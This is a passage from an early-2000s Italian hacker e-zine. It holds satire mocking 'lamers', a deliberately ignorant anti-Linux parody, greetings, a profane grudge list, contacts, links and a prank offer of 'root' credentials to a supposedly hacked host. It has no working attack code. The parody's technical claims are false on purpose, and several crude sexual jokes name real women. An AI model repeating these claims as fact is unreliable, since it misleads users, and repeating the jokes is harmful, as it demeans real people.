comunis si nutre di mailbombing e di trojan.Godono alla vista di una mailbox intasata senza alcun motivo come uno squalo all'odore del sangue.I trojan horses gli permettono di sopravvivere all'interno di ignari pc,con un comportamento simile a quello di una zecca.Ogni tanto inseriscono variazioni nella loro dieta come kickate in IRC ,oppure nukkate casuali,ma sempre secondo la regola della "sopravvivenza passiva".La "sopravvivenza passiva" si basa su un semplice ma fondamentale concetto:perchè sbattersi per procurarsi ciò che ci serve quando sono gli altri a farlo per noi? LA LINGUA I lamers hanno un loro lessico particolare:la sintassi è tattica(cioè applicata o stravolta a seconda dei casi),come anche l'uso del congiuntivo(considerata un'arma letale).Inoltre,al posto delle comuni lettere dell'alfabeto,utilizzano la cosidetta "numerazione letteraria", ovvero al posto di alcune lettere vengono utilizzati dei numeri,secondo il seguente schema: - 4 = A - 5 = S - 1 = I - 0 = O - 3 = E - 8 = B Oltre a queste corrispondenze alfanumeriche,anche la Kappa ha subito diverse sevizie prima di essere codificata in una regola:"la K ci va ogni volta che ci è un suono C" (traduzione da "L4 k v4 us4t4 0gn1 v0lt4 k3 c1 3' 1 su0n0 C" effettuata da C. Milton,tratta dal libro "Il mito del Lamer tra realtà e putridume"). Altra peculiarità grammaticale risiede nell'uso della Z ogni volta che compare il suono S,e nell'alternanza spasmodica di maiuscole e minuscole (S0n0 s0L0 Un Gr4nD3 L4M3R0n3 !). FORME PRIMORDIALI DI INTELLIGENZA Dopo l'accurata osservazione compiuta da Milton nel corso delle sue ricerche,si è notato che ogni lamer parla male di Windows,indiscriminatamente(soprattutto Win95). Ora,è vero che l'OS Microsoft non sia uno dei migliori in fatto di stabilità e di affidabilità,ma siamo cresciuti con i suoi prodotti!Un minimo di riconoscenza!E poi,a saperlo utilizzare e configurare a fondo non è che sia poi così male... Torniamo a noi.Il lamer comunis fa di tutto per ridicolizzare il povero Bill Gates (con frasi tipo "M1kr0z0ft Kr3p4" e cosette del genere),quando non sa neanche che cosa possa essere un file di libreria;a quel punto il suo cervello comincia a ronzare come uno scooter smarmittato e giunge alla fantozziana conclusione di installare Linux.A quel punto al lamer crolla il mondo addosso:sbaglia la partizione(p4rT1Z10n3? M4 k3 3'?),non sa che cosa sia la partizione di swap(K0s4 3'? Un 8i5k0Tt0?) e si pone la domanda apocalittica:avrò fatto male a cancellare i miei milioni di filez senza un backup? Smonta l'ardisk,ne compra uno nuovo con Win pre-installato e gli sale una carogna da mezzo quintale che non lo fa dormire per una notte. La maggior parte degli studiosi pensano che la mentalità da fallito e frustrato sia da attribuirsi al tentativo di installazione del Pinguino. Un altro caso in cui il lamer accresce il proprio senso di appartenenza all'Und3rgr0und informatico (e ne viene subito catapultato fuori) è l'overclocking.Pur non conoscendo la differenza tra una Simm e una Dimm,smanetta sulla scheda madre,scagliando a miglia di distanza jumpers,slot PCI (come ci riescano non si sa ancora) e processore (credendo che sia solo una spilla di metallo molto pesante e con tante puntine inutili). Quando si rende conto di aver distrutto il pc da 5 milioni comprato dal babbo,la carogna ingrassa e sale verso i 200 Kg.Il lamer allora non dorme per due notti. LA VITA SOCIALE Il lamer ama le donne,purchè gliela diano subito.Questo giustifica l'unione con la "Gnappa Orribilis",specie sempre più diffusa(soprattutto nei licei) che si ciba di qualsiasi cosa renda la sua pelle simile ad uno zerbino bagnato. Possono vivere sia da soli che in branco.Nel primo caso il loro passatempo preferito è la masturbazione davanti all'effige di Daria Bignardi come l'ha fatta mammà("nella caaaaaaasaaaa....");nel secondo è lo stesso,ma la masturbazione di gruppo ha come oggetto del desiderio Rita Levi Montalcini vestita da Wonder Woman. Il lamer acquista notorietà se viene "pizzicato" in azione.A quel punto diventa un idolo per gli altri,qualsiasi idiozia abbia fatto. PREDATORE O PREDA? Sicuramente preda.Di chi?Di certo si sa che le altre specie superiori,dalle larve all'alieno che avete come vicino di casa,lo considerano un bocconcino prelibato.Flamers, hackers e sysadmin sono i predatori più comuni.Ma il lamer continua a non voler imparare. |-------------------------------------------------------------| |Art. N° <27> : "Testo di contropropaganda su Linux" di Marvin| |-------------------------------------------------------------| -------------------------------- TESTO DI CONTROPROPAGANDA SU LINUX altrimenti detto LA PAROLA DI UN LAMER E' SACRA ------------------------------- testo scritto in una crisi di follia Martedì 2 Gennaio 2002.Mi presento,sono H4ck3r_d31_5i5t3m1_1mp055ib1li.Ma per ragioni di brevità mi chiamano tutti il SUPR3M0. il mio testo è una sorta di propaganda contro Linux xkè a dire la verità ci ha rotto proprio i coglioni questo sistema friuèr e opensors!Illustrerò i motivi che dovrebbero spingere un vero h4ck3r a usare window e i programmi che la rete ci mette a disposizione. Per prima cosa,non è vero che window è un pacco.Innanzitutto volevo dire al mio amico "5ono_il_+_br4v0_h4ck3r_d3l_mondo" che winXP è crakkabilissimo,perkè c' ho un parente che lavora per ma Meccafii che mi ha detto che suo figlio che studia informatica ha incontrato uno sviluppatore della Maicrosoft che gli ha fatto vedere come si fa in 3 minuti e senza trojan!Quindi non sparare puttanate,il crack è facilissimo se conosci l'html,pirla! Allora,window è facilissimo,al contrario di linux che deriva da sistemi Iunics e che c' ha un promt dei comandi completamente diverso dal DOS.E' anche vero che Linux usa la grafica (ma a quanto ne so io solo la Slakuer 4.1 la usa),ma appena l'ho installato non ci ho capito più niente!E poi richiede conoscenze disumane:solo Neo di Matrix (minchia che film,un mio amico ha h4kerato il sito dell' NSA con telnet in modalitàù "Realtà Virtuale" !)riuscirebbe a capire anche solo le partizioni. Mi è sempre bastata quella di win (che è già fatta) e non vedo perkè deve arrivare linucs a stravolgere le cose! Secondo motivo:se window lo usano in tutto il mondo,un motivo ci sarà! Innanzitutto puoi usare tutti i programmi che vuoi,tanto sono tutti per window (ah,poi mettero sul mio bellissimo sitoz http://members.idiots.com/h4k3ro_il_m0nd0 la crackz per usare su win i giochi e i programmi del Makintosc... ;-) );poi io mi fido di uno come Bill Gheits,che si è fatto da solo ed è riuscito ad inventare il DOS con le sue mani.Uno così non deve essere mica pirla,altrimenti non sarebbe l'uomo più ricco del mondo.Poi non credo che abbia fregato l'idea alla Xerox per window,quello è un genio e questa è solo una volg4re menzogna. Un altro motivo che spingerebbe qualsiasi vero h4ck3r ancora indeciso sul da farsi è che con win puoi usare tutti i trojan e le beckdoor che ci sono in circolazione,mentre linux non le ha.Anche perchè linux è nato come server,e figurati se su un sistema nato x exere server fanno girare delle backdoor,non sono mica scemi...ho sentito dire che ci sono anche dei trojani e delle beck che puoi usare su linux,ma per usarle devi aggiornare il kernel altrimenti swappano troppo,e poi per farle devi conoscere benissimo l'assembler,e quello sono solo in 8 in tutto il mondo che lo sanno :-( Quando è uscito Linux il suo creatore (che si chiama Linux Torvaldo e ha iniziato il progetto GNU per la salvaguardia delle specie bovine africane) disse che linux è un "sistema per hacker fatto da hacker",ma non aveva considerato che un vero hacker sa usare i trojan come Netbas e BekOrifais,ed è stata una vera mossa da pirla non fari girare sulla sua piattaforma! E poi linux è troppo inkasinato:prima cosa è che ci sono moltissime edizioni completamente diverse le une dalle altre,e i programmi per un'edizione non sono compatibili per un'altra.Esistono addirittura delle edizioni su un singolo dischetto,ma non dimentichiamo che anche win 3.1 occupava una manciata di dischetti... Con win invece le cose non sono così complicate,per una serie di semplici motivi: -Non devi aggiornare il registro di configurazione ogni tanto,perchè basta prendersi le varie patch da Internet (che tra l'altro pesano pochissimo,dagli 8 ai 17 Megabait) per aggiornare i difetti del sistema -TUTTI i modem sono per windows.Infatti chi usa linux o usa modem per linux oppure non va in internet. -Linux non ha giochi belli e non riesce a sfruttare le schede video con più di 2 Megabait perchè non riescono a creare i driver di quelle più recenti. -Per usare decentemente Linux devi sapere: DOS,C,C++,Pascal,Turbo Pascal,Visual Basic(che l'hanno copiato dalla Maicrosoft,copioni e bari!),Visual C++,Java,Javascript,ASP,PHP,Perl,CGI,Tcl/Tk,HTML,CSS,Assembler,Flash,Director,Xml,Wml,Xtml,i marcatori meta e come fare una crostata di mele con le pere. -Linux non è compatibile con niente.Windows invece si.Ammetto che il 95 non era il massimo (soprattutto perchè non potevi draggare le icone sul menu Start),ma dal 98 in poi win è stabilissimo,bugiardo chi dice il contrario.L'unico errore che forse ha commesso la Maicrosoft è quella di mettere un firewall in WinXP:un firewall si chiama così perchè scalda un sacco il pc,e quest'ultimo deve avere delle grosse ventole o un bagno d'olio refrigerante per non causare problemi.Vabbè che è una versione home del firewall,ma comunque a lungo andare stressa i componenti del PC. -Windows è ottimo come server.E' per questo che circa il 90% dei server di Internet usa window,soprattutto 2000 e NT,ma non è troppo raro trovare server con win 98. -Ok,questo devo riconoscerlo:i pochi programmi di Linux sono totalmente gratis (ma le versioni di Linux si pagano,molte volte più di window),ma te li devi compilare tutti e devi farci delle modifiche sennò non funzionano.Un amico di mio cugino ha il padre che di lavoro fa giochi (lui e suo figlio hanno fatto Queik III Arena e Eig of Empaiers II) e ha detto che per compilare un programma che aveva scritto per lui e che pesava solo 25 Kilobait il suo compilatore di Linux ci ha messo esattamente 13 ore,durante le quali il pc ronzava e il lettore cd girava a vuoto! Invece win non ha questi problemi:ogni programma è già stato compilato (compresi i trojan) ed è già sotto forma di file con estensione .exe (che qualcuno dovrà spiegarmi che significa altrimenti impazzisco) Tutti questi chiari motivi dovrebbero spingere un vero h4ck3r a non utilizzare più linux,o a non installarlo proprio,perchè è un vero pakko e in definitiva non serve a niente.Ecco. ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|-----------------------------|1ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| SALUTI & RINGRAZIAMENTI |0%101ð0101|010:10&101 01*010&101µ01þ010@10101½|-----------------------------|0°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Beh, questi non potevano davvero mancare... O no? ;) Elektro e tutto il suo corpo telematico saluta: Allora qui trovate tutti i saluti, ringraziamenti e company ai nostri amici smanettoni! Ovviamente, rigorosamente in ordine alfabetico... ;) Tutti quelli di #hack, #smanettoni e del chan #hacknitro, tutte le persone che conosco, in particolare (in ordine alfabetico ;))): BARTX: frà, grazie per l'articolo per l'e-zine e complimenti per il sito: c'è roba interessante! ;D BIGALEX: pazzi come te ce ne sono pochi... ;) Ah, grazie per i 3 articoli pubblicati in quest'e-zine... :D D3FU: Mi spiace molto per quel che ti è successo... :-(( DELILAH: sei una delle poche ragazze che si interessa di hacking... Continua così! ;)) E4M : E io che credevo che scherzassi con tutti quei testi... eheheh A proposito, complimenti, sono davvero interessanti... Altrimenti non li avrei pubblicati... ERMAK: Leggi sta ezine ;) e poi se ti piace puoi sempre scrivere un articoletto per il secondo numba... ;) HOLYHACK: grazie 1000 per dedicarmi il tuo tempo al posto di rilassarti in vacanza! ^__^ _KOME_: ovvero l'amico Shisha-dipendente... ;) Dai, come al solito è solo una battuta, sai che non è nulla di personale... ;) Frà aspetto il tuo testo sull'XML, lo pubblico sul secondo numero dell'e-zine. KORVIN: Uhmm.. topazzi.com... Ci sto ripensando, dopotutto quello spazio mi farebbe comodo... eheheh Comunque grazie per la tua disponibilità! MARSIO: Vedo che sei ancora tra noi... ;) Beh, occhio con i *.gov! Non fare troppo il folle! E leggi bene sta' e-zine... ;) MEPHISTO: Colui che emette più "ROTFL" che parole sensate... ;DD Ah, cazzo.. Mi spiace per TBOG, ma fallo tornare presto online da qualche altra perte: ne vale la pena! ;) M3XICAN: Dobbiamo sentirci na' sera in chat... ;) Grazie anche a te per i tuoi testi e fammi sapere che ne pensi di sta' e-zine. RAPTOR_: Rap, grazie pure a te per il testo e magari scrivine un altro per la prox uscita dell'e-zine! ;-) SILDON2K: Dobbiamo risentirci... Va beh, nel frattempo resta al fronte soldato ;)) e stammi bene! THE VAMPIRE: Cazzo... Non ci sentiamo da una vita! Ma dove sei finito? In chat non ci sei, alle mail non rispondi e al cell pure... Fatti sentire! X3L4: hai visto che stiamo per far conoscere un po' alla gente il mitico #hacknitro ? Ah, casomai per la prox uscite dell'e-zine scrivi anche te qualcosa...;) XANTHIC: Weee.. pure tu, fammi sapere che ne pensi di sta' e-zine e ricaricati il cell! ;)) XPTERMINATOR: Minchia... Tu sei peggio di un bot: in chat ci sei sempre (o quasi)... ;)) Infine una slinguazzata e un saluto a quella grandissima gnocca che tanto so che non mi farò mai :°°-( di nome Megan Gale!! Uhmm... Se ho dimenticato qualcuno, mi raccomando non offendetevi! Mica sono.. che ne so.. Dopotutto sono umano anch'io! ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| F U C K |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ [Commento di Elektro: tutte le righe che ho scritto qui sotto, prendetele come una cazzata, mi raccomando, altrimenti poi sembro più fumato di quel che in realtà sono... ;))] Questi non volevo metterli... Dopotutto questa è una e-zine seria... Io sono una persona seria (e anche Marvin)... Sono una persona che non scrive 'Vaffanculo' o su qualche byte sperduto del suo hard disk per prendersela con i coglioni di turno: sono di più serio di tutto ciò... ahahah Ma quante cazzate sparo? ihihih Sono ogni giorno peggio: da ricovero ;)) Va beh, cominciamo con la listona... ;-) Fuck......[Loading]......ammazza ma quanto è lunga?!? ihihihihih - Alla sQuola (immancabile...) e a tutte le istituzioni scolastiche ;) - Alla GDF: ma quanto rompete le palle... - Alla Telecoz (un saluto speciale a te lo dovevo fare... ;)): sei la stronza che fa pagare care le bollette! Porcodio... Io voglio andare su Internet, ma non ci voglio andare con il contascatti in mano... ihihihih Scherzo raga! - A tutte le altre compagnie telefoniche... Infostrada, Wind, Omnitel, Blu e tutte quelle che ho dimenticato... - Tutti quelli che dicono che SOLO la Tim è ladra... Non ho parole ragazzi... E l'Omnitel forse no? Io ho Omni e pago 1 sms ben 250 £ mentre in molte altre nazioni d'Europa gli sms si pagano pochissimo o sono TOTALMENTE GRATIS... Tutte le compagnie sono ladre.. Che cazzo andate a dire solo la Tim... Ma vaffanculo va... [okkey mi sono calmato...] - Tutti quelli che mi rompono i coglioni. - Tutti quelli che non credono in me e nelle mie capacità. - I lamer: dai non offendetevi troppo, in fin dei conti vi ho messi pure all'8° posto... Mica male... ;) ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| D O V E T R O V A R C I |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Potete fare 4 chiacchiere con noi inviandoci semplicemente una mail: Elektro : teo1987@libero.it Marvin : mh@altavista.it Elektro lo potete trovare anche su IRC, su Azzurra: Server Porta irc.azzurranet.org 6667 Chan: #hacknitro #hack #smanettoni E assieme a me qui su Azzurra troverete i miei amici, anche qualcuno che ha scritto qui su questa e-zine. NB = Okkio che purtroppo non ci sono tutte le sere in chat (eheh ho anch'io una mia vita sociale e i miei impegni nonostante le parecchie ore sul PC ;DD). ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| INVIARCI UN ARTICOLO |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Come inviare un vostro articolo alla Redazione? Semplice, scrivete alla mail x-system@email.it, mettendo in allegato il vostro testo. Se io e Marvin lo giudicheremo un buon testo, lo pubblicheremo qui nell'e-zine. Comunque in ogni caso vi risponderemo per mail. ;)) Tutto chiaro? Si..... ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| LINKS |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Ed ecco un pò di links che potrebbero rivelarsi utili in qualsiasi occasione: ....Underground Site.... -http://www.x-system.cjb.net Il sito ufficiale della nostra e-zine -http://members.xoom.it/lelolo Il mio sito -http://www.bismark.it Non credo ci sia bisogno di spiegazioni... -http://www.packetstormsecurity.com Exploit, patch, security, sito da visitare ogni giorno ;-) -http://napolihak.da.ru Sito che tratta di hacking,phreaking,linux,con una sezione abbastanza fornita di manuali in italiano,traduzioni o in lingua originale -http://www.quequero.cjb.net Sito ufficiale di Quequero -http://www.ilfronte.net Buon sito,con un forum sempre più in crescendo,e che ospita nientepopodimeno che Mimmuz e l'ormai latitante MrWolf(scherzo!) -http://www.raulken.it Neanche in questo caso non credo ci sia bisogno di spiegazioni... -http://www.feelinglinux.com http://www.valtellinux.com http://www.RedHat.it -http://www.spippolatori.com A quanto si legge sul sito ("www.spippolatori.com is coming...) dovrebbero essere online tra qualche tempo... -http://members.xoom.it/_XOOM/e4zy/nuovo/main.htm L'Hacking Time di E4zy ;) Davvero un buon sito, peccato che (se non ricordo male) non viene aggiornato da molto... -http://digilander.iol.it/kaos Altro buon sito di Hack. Visitatelo ;) -http://www.bigalex.cjb.net Il portale dove potrete trovare molti links a tutto ciò che riguarda il mondo Undeground ma anche molto altro! Bel lavoro, Biga! -http://www.bartx.cjb.net Il sito di Bartx, ricco di materiale molto interessante... -http://digilander.iol.it/Delilahh Il sito di Delilah, ben fatto e aggiornato. Brava Dely! -http://www.bucailsito.it Interessante concorso per chi ha voglia di giocare o tempo da perdere ;-) -http://www.programmazione.it Tutto e di + sulla programmazione! -http://www.html.it Un sito che dovrebbe interessare tutti i webmaster! ....Altri.... -http://www.ruttando.com Sito che ha indetto un concorso sul miglior rutto e la miglior scorreggia.Peti e rutti in graduatoria da ascoltare! Eccoli tutti qui... Spero di averli scritti tutti giusti ;) e di non avermi dimenticato di qualche amico che poi mi spenna ;DD Se per voi questi sono pochi, beh, ci scusiamo, in futuro ne scriveremo senz'altro molti altri. Se volete segnalare il vostro sito, mandate tutto a x-system@email.it e magari troverete il vostro sito nella prox uscita dell'ezine. ;-) ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| T H E E N D |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Ragazzi l'e-zine è finita... Spero vi sia piaciuta e che possa essere servita a qualcuno di voi... In ogni caso un arrivederci a due mesi. La data dell'uscita del 2° numero dell'e-zine è ancora da destinarsi, non la scrivo qui perchè tra 2 mesi chissà quanti impegni mi potrei avere proprio quella sera! Non si sa mai... ;) Un saluto a tutti i lettori di questa neonata e-zine! Ma che volete leggere ancora? Okkey... Visto che oggi sono MOLTO buono qui in fondo nelle ultime righe di questa neonata e-zine troverete user e pass di un piccolo sistema da me bucato... regalino: account con diritti r00t ;)) host: computersys.org user: "chi legge" pass: "è scemo" Mi raccomando scrivete tutto senza apici!! ;)) PS : ahahah.. che burlone che sono... ihihih Non cambierò mai... Ma davvero siete arrivati qui a leggere ?!? ihihihih.. ele...